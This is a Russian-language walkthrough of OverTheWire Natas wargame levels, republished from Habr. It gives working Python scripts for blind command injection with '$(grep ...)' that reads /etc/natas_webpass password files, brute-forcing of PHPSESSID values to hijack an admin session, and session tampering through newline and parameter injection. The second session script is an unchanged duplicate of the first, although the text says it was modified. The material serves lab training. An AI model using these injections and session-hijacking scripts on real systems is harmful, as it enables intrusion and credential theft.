- PVSM.RU - https://www.pvsm.ru -
В данной статье мы разберемся с эксплуатацией некоторых WEB-узвимостей на примере прохождения варгейма Natas [1]. Каждый уровень имеет доступ к паролю следующего уровня. Все пароли также хранятся в файлах /etc/natas_webpass/. Например, пароль для natas5 хранится в файле /etc/natas_webpass/natas5 и доступен для чтения только для пользователей natas4 и natas5.
Прошлые части: часть 1 [2] и часть 2 [3].
Вдобавок к этому я поделюсь своим опытом в компьютерной криминалистике, анализе малвари и прошивок, атаках на беспроводные сети и локальные вычислительные сети, проведении пентестов и написании эксплоитов.
Чтобы вы могли узнавать о новых статьях, программном обеспечении и другой информации, я создал канал в Telegram [4] и группу для обсуждения любых вопросов [5] в области ИиКБ. Также ваши личные просьбы, вопросы, предложения и рекомендации рассмотрю лично и отвечу всем [6].
Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа.
Судя по исходному коду, все служебные символы фильтруются, а передача «склейки» из двух файлов невозможна, так как строка передается в кавычках.
Используя конструкции типа $(cmd) можно контролировать вывод «key».
Идея такая:
import httplib
import urllib
import re
import base64
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
count = 0
headers = {}
conn = httplib.HTTPConnection("natas16.natas.labs.overthewire.org")
headers["Authorization"] = "Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA=="
count = 0
passwd = ""
while count != 32:
for i in range(len(charset)):
needle = urllib.quote_plus("$(grep -E ^" + passwd + charset[i] +".* /etc/natas_webpass/natas17)Afr")
conn.request("GET", "/?needle=" + needle + "&submit=Search", "", headers)
r1 = conn.getresponse()
data = r1.read()
if(data.count("African") == 0):
passwd += charset[i:i+1]
print(str(count) + " : " + str(passwd))
count += 1
break
conn.close()
print("Password : " + passwd)
Получили пароль.
Используем sqlmap по прошлому сценарию (из второй части).
Есть пароль.
Разберем исходный код.
Первым делом идет проверка, выставлены ли в браузере куки.(функция my_session_start()).
Так как в задании управлять кроме куки нечем, значит они должны быть выставлены, т. е. функция вернет false и в корневом коде мы пойдем в ветку else. Проверка заполнения полей username и password. Функция session_id() принимает случайное число в диапазоне от 1 до 640 (что очень странно, почему такое ограничение) и создает устанавливает конфигурации для функции session_start().
Далее проверяется username == «admin». Если мы зашли как админ, то нам об этом сообщают и дают пароль для следующего уровня.
Идея решения: для пользоватлей определен диапазон id. Напишем брутфорсер, который будет заходить на страницу c id в диапазоне от 1 до 640.
import requests
from requests.auth import HTTPBasicAuth
import binascii
host = 'http://natas19.natas.labs.overthewire.org/'
auth = HTTPBasicAuth('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
params = {'username':'admin', 'password':'admin'}
for i in range(0, 640):
print(i)
phpsessid = binascii.hexlify(str(i)+"-admin")
cookies={'PHPSESSID':phpsessid}
r = requests.get(host, params=params, cookies=cookies, auth=auth)
if('Password' in r.content):
print(r.content)
break
Получаем пароль при id = 119.
Так как код один и тот же, то и идея та же. Посмотрим cookie.
Сторока в hex кодировке. Раскодируем.
Осталось просто изменить код.
import requests
from requests.auth import HTTPBasicAuth
import binascii
host = 'http://natas19.natas.labs.overthewire.org/'
auth = HTTPBasicAuth('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
params = {'username':'admin', 'password':'admin'}
for i in range(0, 640):
print(i)
phpsessid = binascii.hexlify(str(i)+"-admin")
cookies={'PHPSESSID':phpsessid}
r = requests.get(host, params=params, cookies=cookies, auth=auth)
if('Password' in r.content):
print(r.content)
break
Есть пароль.
После анализа исходного кода можно предположить, что внимания заслуживают 2 функции.
Функция mywrite() записывает данные на каждой строке как ключ_значение. Но ключ выбирается случайно, а значение передается из поля ввода.
Функция myread() проходит по всем строками считывает разделенные пробелом данные (ключ и значение).
Мы увидим пароль только если в таком файле окажется строка «admin 1». Дело в том, что мы можем обойти логику приложения и записать сколько строк, сколько захотим. Для этого мы должны послать строку вида «Значение0_ПереводСтроки_Ключ1_Значение1 и т.д.»
После того как значение запишется в файл, перезагрузим страницу, чтобы оно считалось из файла.
Забираем пароль.
Нам предоставляют две версии сайта. Дело в том, что cookie и session доступны для передачи между разными страницами на одном домене. Изучаем исходный код второго сайта. В сессию устанавливаются все принятые параметры. По аналогии с прошлыми уровнями следует установить admin => 1.
Просто добавим новый параметр admin со значением 1, перезагрузим страницу и выставим эти cookie на главную страницу.
Забираем пароль.
Продолжение следует. Вы можете присоединиться к нам в Telegram [4].
Автор: RalfHacker
Источник [7]
Сайт-источник PVSM.RU: https://www.pvsm.ru
Путь до страницы источника: https://www.pvsm.ru/python/327930
Ссылки в тексте:
[1] Natas: http://overthewire.org/wargames/natas/
[2] часть 1: https://habr.com/ru/post/464111/
[3] часть 2: https://habr.com/ru/post/464443/
[4] канал в Telegram: https://t.me/RalfHackerChannel
[5] группу для обсуждения любых вопросов: https://t.me/RalfHackerPublicChat
[6] рассмотрю лично и отвечу всем: https://t.me/hackerralf8
[7] Источник: https://habr.com/ru/post/464729/?utm_campaign=464729&utm_source=habrahabr&utm_medium=rss
Нажмите здесь для печати.